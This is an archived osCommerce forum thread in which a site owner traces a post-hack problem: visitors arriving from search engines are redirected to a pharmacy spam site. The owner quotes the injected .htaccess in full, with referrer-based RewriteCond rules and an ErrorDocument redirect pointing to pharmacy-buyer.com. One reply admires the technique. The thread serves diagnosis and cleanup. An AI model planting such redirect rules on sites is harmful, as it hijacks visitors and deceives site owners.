dayOff Posted March 29, 2010 Posted March 29, 2010 Hi I'm trying to fix a site that did get hacked. To fix that I just deleted all the files and re-copied them over. Problem is, that was a few days ago. When I go to http://www.slimmersupplements.com/ directly, it's fine (woman with tape measure around her tummy). But if I search for slimmer supplements in Google (or Yahoo!) and click it (first result) it goes to the hacked site (pharmacacy-buyer.com). How so? How to fix? Using osCommerce 2.2-MS2 Cheers J ---------------------------- John Allsopp http://www.johnallsopp.co.uk/
♥mdtaylorlrim Posted March 29, 2010 Posted March 29, 2010 Hi I'm trying to fix a site that did get hacked. To fix that I just deleted all the files and re-copied them over. Problem is, that was a few days ago. When I go to http://www.slimmersupplements.com/ directly, it's fine (woman with tape measure around her tummy). But if I search for slimmer supplements in Google (or Yahoo!) and click it (first result) it goes to the hacked site (pharmacacy-buyer.com). How so? How to fix? Using osCommerce 2.2-MS2 Cheers J IF your site is now fixed then Google should update in a few days. Community Bootstrap Edition, Edge Avoid the most asked question. See How to Secure My Site and How do I...?
Guest Posted March 30, 2010 Posted March 30, 2010 Hi I'm trying to fix a site that did get hacked. To fix that I just deleted all the files and re-copied them over. Problem is, that was a few days ago. When I go to http://www.slimmersupplements.com/ directly, it's fine (woman with tape measure around her tummy). But if I search for slimmer supplements in Google (or Yahoo!) and click it (first result) it goes to the hacked site (pharmacacy-buyer.com). How so? How to fix? Using osCommerce 2.2-MS2 Cheers J If I click the link in your post it goes to the pharmacy_buyer site.
MrPhil Posted March 30, 2010 Posted March 30, 2010 It's not Google's fault. Their link is to your site is fine. If I click on your link, it gets redirected, which probably means there's still something on your site redirecting. Have you looked in your [tt].htaccess[/tt] file to see if there is a URL rewrite? If not, and your own site files are clean (no <meta> refresh tag), let your ISP and domain registrar know. It's possible that something has been hacked on the DNS side to send your domain to your competitor's site. That's illegal, and should be reported.
dayOff Posted March 30, 2010 Author Posted March 30, 2010 Have you looked in your [tt].htaccess[/tt] file to see if there is a URL rewrite? Thanks guys, yes it was the .htaccess file. It contained: RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*news.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*maps.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC] RewriteRule .* http://pharmacy-buyer.com/order_weight_loss_en-us.html [R,L] ErrorDocument 404 http://pharmacy-buyer.com/order_weight_loss_en-us.html Cheers J ---------------------------- John Allsopp http://www.johnallsopp.co.uk/
jstnmarsh Posted March 30, 2010 Posted March 30, 2010 Hey there, That's a very good technique that I would love to use to provide a better look to my website. Thanks for the useful suggestion ad I think that this i gonna make some thing that I got to do for my weekend.
dayOff Posted March 31, 2010 Author Posted March 31, 2010 Hey there, That's a very good technique that I would love to use to provide a better look to my website. Thanks for the useful suggestion ad I think that this i gonna make some thing that I got to do for my weekend. Not sure what you mean, but from a search engine point of view, using that technique (even for good) is sure to be frowned upon. J ---------------------------- John Allsopp http://www.johnallsopp.co.uk/
Recommended Posts
Archived
This topic is now archived and is closed to further replies.